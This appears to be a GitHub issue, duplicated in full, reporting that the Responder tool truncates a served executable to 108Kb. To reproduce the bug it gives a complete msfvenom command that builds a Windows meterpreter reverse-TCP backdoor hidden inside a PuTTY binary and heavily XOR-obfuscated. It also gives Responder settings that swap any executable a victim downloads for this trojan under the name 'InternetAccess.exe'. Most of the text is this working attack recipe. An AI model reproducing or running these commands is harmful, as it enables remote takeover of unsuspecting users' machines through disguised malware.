Open wmagliano opened 6 months ago
1) Payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=8443 -f exe -a x64 -o putty-68-64-8443.exe --platform windows -x putty-68-64.exe -e x64/xor_dynamic -i 500 --encrypt xor --encrypt-key S3C43ts
2) Configure Responder.conf ; Set to On to replace any requested .exe with the custom EXE Serve-Exe = On
; Set to On to serve the custom HTML if the URL does not contain .exe ; Set to Off to inject the 'HTMLToInject' in web pages instead Serve-Html = On
; Custom HTML to serve HtmlFilename = /mnt/AccessDenied.html
; Custom EXE File to serve ExeFilename = /mnt/putty-68-64-8443.exe
; Name of the downloaded .exe that the client will see ExeDownloadName = InternetAccess.exe
3) When you download via Reponder the size is truncated to 108Kb
Only when you try a payload like this... woks msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.115 LPORT=8443 -f exe -a x64
1) Payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=8443 -f exe -a x64 -o putty-68-64-8443.exe --platform windows -x putty-68-64.exe -e x64/xor_dynamic -i 500 --encrypt xor --encrypt-key S3C43ts
2) Configure Responder.conf ; Set to On to replace any requested .exe with the custom EXE Serve-Exe = On
; Set to On to serve the custom HTML if the URL does not contain .exe ; Set to Off to inject the 'HTMLToInject' in web pages instead Serve-Html = On
; Custom HTML to serve HtmlFilename = /mnt/AccessDenied.html
; Custom EXE File to serve ExeFilename = /mnt/putty-68-64-8443.exe
; Name of the downloaded .exe that the client will see ExeDownloadName = InternetAccess.exe
3) When you download via Reponder the size is truncated to 108Kb
Only when you try a payload like this... woks msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.115 LPORT=8443 -f exe -a x64